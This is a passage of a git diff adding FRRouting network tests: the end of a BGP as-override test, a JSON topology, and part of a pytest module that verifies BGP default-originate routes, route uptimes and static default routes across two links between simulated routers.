+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.common_config import step
+
+pytestmark = [pytest.mark.bgpd]
+
+
+def build_topo(tgen):
+ for routern in range(1, 7):
+ tgen.add_router("r{}".format(routern))
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r2"])
+ switch.add_link(tgen.gears["r3"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r3"])
+ switch.add_link(tgen.gears["r4"])
+
+
+def setup_module(mod):
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+
+ for i, (rname, router) in enumerate(router_list.items(), 1):
+ router.load_config(
+ TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname))
+ )
+
+ tgen.start_router()
+
+
+def teardown_module(mod):
+ tgen = get_topogen()
+ tgen.stop_topology()
+
+
+def test_bgp_as_override():
+ tgen = get_topogen()
+
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ r3 = tgen.gears["r3"]
+ r4 = tgen.gears["r4"]
+
+ def _bgp_converge():
+ output = json.loads(r3.vtysh_cmd("show ip bgp neighbor 192.168.2.1 json"))
+ expected = {
+ "192.168.2.1": {
+ "bgpState": "Established",
+ "addressFamilyInfo": {"ipv4Unicast": {"acceptedPrefixCounter": 2}},
+ }
+ }
+ return topotest.json_cmp(output, expected)
+
+ def _bgp_as_override():
+ output = json.loads(r4.vtysh_cmd("show bgp ipv4 unicast json"))
+ expected = {
+ "routes": {
+ "172.16.255.1/32": [{"valid": True, "path": "65003 65002 65003"}]
+ }
+ }
+ return topotest.json_cmp(output, expected)
+
+ step("Initial BGP converge")
+ test_func = functools.partial(_bgp_converge)
+ _, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5)
+    assert result is None, "Failed to see BGP convergence on R3"
+
+ step("Check if BGP as-override from R3 works")
+ test_func = functools.partial(_bgp_as_override)
+ _, result = topotest.run_and_expect(test_func, None, count=60, wait=0.5)
+    assert result is None, "Failed to see overridden ASN (65001) from R3"
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json b/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json
new file mode 100644
index 0000000000..9e98235a2e
--- /dev/null
+++ b/tests/topotests/bgp_default_originate/bgp_default_originate_2links.json
@@ -0,0 +1,136 @@
+{
+ "address_types": ["ipv4", "ipv6"],
+ "ipv4base": "192.168.0.0",
+ "ipv4mask": 3024,
+ "ipv6base": "fd00::",
+ "ipv6mask": 64,
+ "link_ip_start": {
+ "ipv4": "192.168.0.0",
+ "v4mask": 24,
+ "ipv6": "fd00::",
+ "v6mask": 64
+ },
+ "lo_prefix": {"ipv4": "1.0.", "v4mask": 32, "ipv6": "2001:db8:f::", "v6mask": 128},
+ "routers": {
+ "r0": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r1": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "100",
+ "address_family": {
+ "ipv4": {
+ "unicast": {"neighbor": {"r1": {"dest_link": {"r0": {}}}}}
+ },
+ "ipv6": {
+ "unicast": {"neighbor": {"r1": {"dest_link": {"r0": {}}}}}
+ }
+ }
+ }
+ },
+ "r1": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r0": {"ipv4": "auto", "ipv6": "auto"},
+ "r2-link1": {"ipv4": "auto", "ipv6": "auto"},
+ "r2-link2": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "200",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r0": {"dest_link": {"r1": {}}},
+ "r2": {"dest_link": {"r1-link1": {}, "r1-link2": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r0": {"dest_link": {"r1": {}}},
+ "r2": {"dest_link": {"r1-link1": {}, "r1-link2": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r2": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r1-link1": {"ipv4": "auto", "ipv6": "auto"},
+ "r1-link2": {"ipv4": "auto", "ipv6": "auto"},
+ "r3": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "300",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r1": {"dest_link": {"r2-link1": {}, "r2-link2": {}}},
+ "r3": {"dest_link": {"r2": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r1": {"dest_link": {"r2-link1": {}, "r2-link2": {}}},
+ "r3": {"dest_link": {"r2": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r3": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r2": {"ipv4": "auto", "ipv6": "auto"},
+ "r4": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "400",
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "neighbor": {
+ "r2": {"dest_link": {"r3": {}}},
+ "r4": {"dest_link": {"r3": {}}}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "neighbor": {
+ "r2": {"dest_link": {"r3": {}}},
+ "r4": {"dest_link": {"r3": {}}}
+ }
+ }
+ }
+ }
+ }
+ },
+ "r4": {
+ "links": {
+ "lo": {"ipv4": "auto", "ipv6": "auto", "type": "loopback"},
+ "r3": {"ipv4": "auto", "ipv6": "auto"}
+ },
+ "bgp": {
+ "local_as": "500",
+ "address_family": {
+ "ipv4": {
+ "unicast": {"neighbor": {"r3": {"dest_link": {"r4": {}}}}}
+ },
+ "ipv6": {
+ "unicast": {"neighbor": {"r3": {"dest_link": {"r4": {}}}}}
+ }
+ }
+ }
+ }
+ }
+}
diff --git a/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py b/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py
new file mode 100644
index 0000000000..c8cdc7ec5c
--- /dev/null
+++ b/tests/topotests/bgp_default_originate/test_bgp_default_originate_2links.py
@@ -0,0 +1,1414 @@
+#!/usr/bin/env python
+#
+# Copyright (c) 2022 by VMware, Inc. ("VMware")
+# Used Copyright (c) 2018 by Network Device Education Foundation, Inc. ("NetDEF")
+# in this file.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+# Shreenidhi A R <rshreenidhi@vmware.com>
+# THE SOFTWARE IS PROVIDED "AS IS" AND VMWARE DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL VMWARE BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+"""
+Following tests are covered.
+1. Verify default-originate route with default static and network command
+2. Verify default-originate route with aggregate summary command
+"""
+import os
+import sys
+import time
+import pytest
+import datetime
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib.topogen import Topogen, get_topogen
+from lib.topojson import build_config_from_json
+from lib.topolog import logger
+
+from lib.bgp import (
+ verify_bgp_convergence,
+ create_router_bgp,
+ verify_bgp_rib,
+ get_dut_as_number,
+ verify_rib_default_route,
+ verify_fib_default_route,
+)
+from lib.common_config import (
+ verify_fib_routes,
+ step,
+ run_frr_cmd,
+ get_frr_ipv6_linklocal,
+ start_topology,
+ apply_raw_config,
+ write_test_header,
+ check_address_types,
+ write_test_footer,
+ reset_config_on_routers,
+ create_static_routes,
+ check_router_status,
+)
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+sys.path.append(os.path.join(CWD, "../lib/"))
+
+# Required to instantiate the topology builder class.
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+
+# Global variables
+topo = None
+NETWORK1_1 = {"ipv4": "198.51.1.1/32", "ipv6": "2001:DB8::1:1/128"}
+NETWORK1_2 = {"ipv4": "198.51.1.2/32", "ipv6": "2001:DB8::1:2/128"}
+NETWORK1_3 = {"ipv4": "198.51.1.3/32", "ipv6": "2001:DB8::1:3/128"}
+NETWORK1_4 = {"ipv4": "198.51.1.4/32", "ipv6": "2001:DB8::1:4/128"}
+NETWORK1_5 = {"ipv4": "198.51.1.5/32", "ipv6": "2001:DB8::1:5/128"}
+
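+# Route dicts used to query the uptime of the default route installed on r2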
+ipv4_uptime_dict = {
+ "r2": {
+ "static_routes": [
+ {"network": "0.0.0.0/0"},
+ ]
+ }
+}
+
+ipv6_uptime_dict = {
+ "r2": {
+ "static_routes": [
+ {"network": "::/0"},
+ ]
+ }
+}
+
+DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+NEXT_HOP_IP = {"ipv4": "Null0", "ipv6": "Null0"}
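+# Null0 acts as a blackhole next-hop for the locally originated test routes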
+
+pytestmark = [pytest.mark.bgpd]
+
+
+def setup_module(mod):
+ """
+ Sets up the pytest environment
+
+ * `mod`: module name
+ """
+ testsuite_run_time = time.asctime(time.localtime(time.time()))
+ logger.info("Testsuite start time: {}".format(testsuite_run_time))
+ logger.info("=" * 40)
+
+ logger.info("Running setup_module to create topology")
+
+ # This function initiates the topology build with Topogen...
+ json_file = "{}/bgp_default_originate_2links.json".format(CWD)
+ tgen = Topogen(json_file, mod.__name__)
+ global topo
+ topo = tgen.json_topo
+ # ... and here it calls Mininet initialization functions.
+
+ # Starting topology, create tmp files which are loaded to routers
+ # to start daemons and then start routers
+ start_topology(tgen)
+
+ # Creating configuration from JSON
+ build_config_from_json(tgen, topo)
+
+ global ADDR_TYPES
+ global BGP_CONVERGENCE
+ global DEFAULT_ROUTES
+ global DEFAULT_ROUTE_NXT_HOP_LINK1, DEFAULT_ROUTE_NXT_HOP_LINK2
+ ADDR_TYPES = check_address_types()
+ BGP_CONVERGENCE = verify_bgp_convergence(tgen, topo)
+ assert BGP_CONVERGENCE is True, "setup_module :Failed \n Error: {}".format(
+ BGP_CONVERGENCE
+ )
+
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+
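+    # eBGP-learned IPv6 routes carry the peer's link-local address as next-hop,
+    # so capture R1's link-local on each link for the verifications below.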
+ interface = topo["routers"]["r1"]["links"]["r2-link1"]["interface"]
+ ipv6_link_local = get_frr_ipv6_linklocal(tgen, "r1", intf=interface)
+ ipv4_nxt_hop = topo["routers"]["r1"]["links"]["r2-link1"]["ipv4"].split("/")[0]
+ ipv6_nxt_hop = topo["routers"]["r1"]["links"]["r2-link1"]["ipv6"].split("/")[0]
+ DEFAULT_ROUTE_NXT_HOP_LINK1 = {"ipv4": ipv4_nxt_hop, "ipv6": ipv6_link_local}
+
+ interface = topo["routers"]["r1"]["links"]["r2-link2"]["interface"]
+ ipv6_link_local = get_frr_ipv6_linklocal(tgen, "r1", intf=interface)
+ ipv4_nxt_hop = topo["routers"]["r1"]["links"]["r2-link2"]["ipv4"].split("/")[0]
+ ipv6_nxt_hop = topo["routers"]["r1"]["links"]["r2-link2"]["ipv6"].split("/")[0]
+ DEFAULT_ROUTE_NXT_HOP_LINK2 = {"ipv4": ipv4_nxt_hop, "ipv6": ipv6_link_local}
+ logger.info("Running setup_module() done")
+
+
+def teardown_module():
+ """Teardown the pytest environment"""
+
+ logger.info("Running teardown_module to delete topology")
+
+ tgen = get_topogen()
+
+    # Stop topology and remove tmp files
+ tgen.stop_topology()
+
+ logger.info(
+ "Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
+ )
+ logger.info("=" * 40)
+
+
+#####################################################
+#
+# Local APIs
+#
+#####################################################
+
+
+def get_rib_route_uptime(tgen, addr_type, dut, input_dict):
+ """
+ Verify route uptime in RIB using "show ip route"
+
+ Parameters
+ ----------
+ * `tgen` : topogen object
+ * `addr_type` : ip type, ipv4/ipv6
+ * `dut`: Device Under Test, for which user wants to test the data
+ * `input_dict` : input dict, has details of static routes
+
+ Usage
+ -----
+ # Creating static routes for r1
+ input_dict_r1 = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.12.0/24"
+ },
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.13.4/32"
+ },
+ {
+ "network": "147.10.13.4/32"
+ }
+ ]
+ }
+ }
+
+
+ Returns
+ -------
+    errormsg(str) or list of route uptime strings
+ """
+
+ logger.info("Entering lib API: get_rib_route_uptime()")
+ route_time = []
+ out_route_dict = {}
+ router_list = tgen.routers()
+ for routerInput in input_dict.keys():
+ for router, rnode in router_list.items():
+ if router != dut:
+ continue
+
+ logger.info("Checking router %s RIB:", router)
+
+ # Verifying RIB routes
+ if addr_type == "ipv4":
+ command = "show ip route"
+ else:
+ command = "show ipv6 route"
+
+ if "static_routes" in input_dict[routerInput]:
+ static_routes = input_dict[routerInput]["static_routes"]
+
+ for static_route in static_routes:
+ if "vrf" in static_route and static_route["vrf"] is not None:
+
+ logger.info(
+ "[DUT: {}]: Verifying routes for VRF:"
+ " {}".format(router, static_route["vrf"])
+ )
+ cmd = "{} vrf {}".format(command, static_route["vrf"])
+
+ else:
+ cmd = "{}".format(command)
+
+ cmd = "{} json".format(cmd)
+
+ rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
+
+ if bool(rib_routes_json) is False:
+ errormsg = "No route found in rib of router {}..".format(router)
+ return errormsg
+ network = static_route["network"]
+ route_time.append(rib_routes_json[network][0]["uptime"])
+
+ logger.info("Exiting lib API: get_rib_route_uptime()")
+ return route_time
+
+
+def verify_the_uptime(time_stamp_before, time_stamp_after, incremented=None):
+    """
+    Compare two uptime snapshots taken with get_rib_route_uptime().
+
+    * `time_stamp_before` : list holding the uptime string captured first
+    * `time_stamp_after` : list holding the uptime string captured later
+    * `incremented` : when True, verify that the uptime kept increasing,
+      i.e. the route was not re-installed; otherwise the values are only logged
+    """
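+    # The RIB "uptime" string is parsed as HH:MM:SS, so this comparison is only
+    # meaningful for routes that have been up for less than 24 hours.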
+ uptime_before = datetime.datetime.strptime(time_stamp_before[0], "%H:%M:%S")
+ uptime_after = datetime.datetime.strptime(time_stamp_after[0], "%H:%M:%S")
+
+ if incremented == True:
+ if uptime_before < uptime_after:
+ logger.info(
+                " The uptime incremented from [{}] to [{}].......PASSED ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return True
+ else:
+ logger.error(
+                " The uptime was expected to increment from [{}] to [{}].......FAILED ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return False
+ else:
+ logger.info(
+            " The uptime changed from [{}] to [{}]; increment not expected ".format(
+ time_stamp_before, time_stamp_after
+ )
+ )
+ return True
+
+
+#####################################################
+#
+# Testcases
+#
+#####################################################
+
+
+def test_verify_bgp_default_originate_with_default_static_route_p1(request):
+ """
+ Summary: "Verify default-originate route with default static and network command "
+
+ """
+ tgen = get_topogen()
+ global BGP_CONVERGENCE, DEFAULT_ROUTE_NXT_HOP_LINK1, DEFAULT_ROUTE_NXT_HOP_LINK2, DEFAULT_ROUTES
+
+ if BGP_CONVERGENCE != True:
+ pytest.skip("skipped because of BGP Convergence failure")
+ # test case name
+ tc_name = request.node.name
+ write_test_header(tc_name)
+ if tgen.routers_have_failure():
+ check_router_status(tgen)
+ reset_config_on_routers(tgen)
+
+ step("Configure 2 link between R1 and R2")
+ step("Configure IPV4 and IPV6 EBGP between R1 and R2 both the links")
+ step("Configure default-originate on R1 IPv4 and IPv6 BGP session link-1 only ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {"r2": {"dest-link": "r1-link1"}}
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+    step("Verify IPv4/IPv6 default-originate routes are present on R2 with next-hop as link-1")
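+    # verify_fib_routes()/verify_bgp_rib() expect a "static_routes"-style input
+    # dict, so build one describing the default route learned via link-1.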
+ for addr_type in ADDR_TYPES:
+ static_routes_input = {
+ "r2": {
+ "static_routes": [
+ {
+ "network": [DEFAULT_ROUTES[addr_type]],
+ "next_hop": DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ }
+ ]
+ }
+ }
+
+ result = verify_fib_routes(
+ tgen,
+ addr_type,
+ "r2",
+ static_routes_input,
+ next_hop=DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ )
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ result = verify_bgp_rib(
+ tgen,
+ addr_type,
+ "r2",
+ static_routes_input,
+ next_hop=DEFAULT_ROUTE_NXT_HOP_LINK1[addr_type],
+ )
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step(
+ "Configure network command on R1 (0.0.0.0/0 and 0::0/0) for IPv4 and IPv6 address family "
+ )
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {"network": [DEFAULT_ROUTES[addr_type]]}
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("No change on IPv4/IPv6 default-originate route advertised from link1")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+    step("Verify 0.0.0.0/0 and 0::0/0 routes also get advertised from link-2 ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step(
+        "Before removing default-originate from R1 link-1 IPv4 and IPv6 address family, taking the uptime snapshot"
+ )
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+    step("Remove default-originate from R1 link-1 IPv4 and IPv6 address family ")
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {"dest-link": "r1-link1", "delete": True}
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Routes must be learned from network command")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("After removing the default originate on R1 taking the uptime snapshot")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After removing the default-originate, uptime should get reset for the link-1 learned route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring default - originate")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure default-originate on R1 link-1 again for IPv4 and IPv6 address family"
+ )
+ local_as = get_dut_as_number(tgen, dut="r1")
+ default_originate_config = {
+ "r1": {
+ "bgp": {
+ "local_as": local_as,
+ "address_family": {
+ "ipv4": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ "ipv6": {
+ "unicast": {
+ "default_originate": {
+ "r2": {
+ "dest-link": "r1-link1",
+ }
+ }
+ }
+ },
+ },
+ }
+ }
+ }
+ result = create_router_bgp(tgen, topo, default_originate_config)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+ step("Verify No change on R2 routing and BGP table for both the links ")
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking snapshot after configuring default - originate")
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After configuring the default-originate, uptime should not get reset for the link-1 learned route"
+ )
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=True)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before removing network 0.0.0.0 ")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step("Remove network command from R1 IPv4/IPv6 address family ")
+ DEFAULT_ROUTES = {"ipv4": "0.0.0.0/0", "ipv6": "0::0/0"}
+ for addr_type in ADDR_TYPES:
+ input_advertise = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ addr_type: {
+ "unicast": {
+ "advertise_networks": [
+ {
+ "network": [DEFAULT_ROUTES[addr_type]],
+ "delete": True,
+ }
+ ]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ result = create_router_bgp(tgen, topo, input_advertise)
+ assert result is True, "Testcase {} :Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step(
+        "Verify 0.0.0.0/0 and 0::0/0 routes get removed from link-2 and the default-originate IPv4/IPv6 route is learned on link-1"
+ )
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK1,
+ )
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_rib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+ ), "Testcase {} : Failed \n Route from link2 is not expected \n Error: {}".format(
+ tc_name, result
+ )
+ result = verify_fib_default_route(
+ tgen,
+ topo,
+ dut="r2",
+ routes=DEFAULT_ROUTES,
+ expected_nexthop=DEFAULT_ROUTE_NXT_HOP_LINK2,
+ expected=False,
+ )
+ assert (
+ result is not True
+ ), "Testcase {} : Failed\n Route from link2 is not expected \n Error: {}".format(
+ tc_name, result
+ )
+
+ uptime_after_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_after_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+        "After removing the network command on R1 verify that the uptime got reset on R2"
+ )
+
+ result = verify_the_uptime(uptime_before_ipv4, uptime_after_ipv4, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ result = verify_the_uptime(uptime_before_ipv6, uptime_after_ipv6, incremented=False)
+ assert result is True, "Testcase {} : Failed Error: {}".format(tc_name, result)
+
+ step("Taking uptime snapshot before configuring static route network")
+ uptime_before_ipv4 = get_rib_route_uptime(tgen, "ipv4", "r2", ipv4_uptime_dict)
+ uptime_before_ipv6 = get_rib_route_uptime(tgen, "ipv6", "r2", ipv6_uptime_dict)
+
+ step(
+ "Configure static default route for IPv4 and IPv6 (0.0.0.0/0 next-hop Null0 and 0::0/0 next-hop Null0) on R1"
+ )
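+    # The Null0 default statics give "redistribute static" a 0.0.0.0/0 and ::/0
+    # prefix to advertise once redistribution is enabled below.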
+ static_routes_input = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "0.0.0.0/0",
+ "next_hop": NEXT_HOP_IP["ipv4"],
+ },
+ {
+ "network": "0::0/0",
+ "next_hop": NEXT_HOP_IP["ipv6"],
+ },
+ ]
+ }
+ }
+ result = create_static_routes(tgen, static_routes_input)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
+
+    step("Verify IPv4 and IPv6 static routes are configured and up on R1 ")
+ for addr_type in ADDR_TYPES:
+ static_routes_input = {
+ "r1": {
+ "static_routes": [
+ {
+ "network": "0.0.0.0/0",
+ "next_hop": NEXT_HOP_IP["ipv4"],
+ },
+ {
+ "network": "0::0/0",
+ "next_hop": NEXT_HOP_IP["ipv6"],
+ },
+ ]
+ }
+ }
+ result = verify_fib_routes(tgen, addr_type, "r1", static_routes_input)
+ assert result is True, "Testcase {} : Failed \n Error: {}".format(
+ tc_name, result
+ )
+
+ step("Configure redistribute static on IPv4 and IPv6 address family")
+ redistribute_static = {
+ "r1": {
+ "bgp": {
+ "address_family": {
+ "ipv4": {"unicast": {"redistribute": [{"redist_type": "static"}]}},
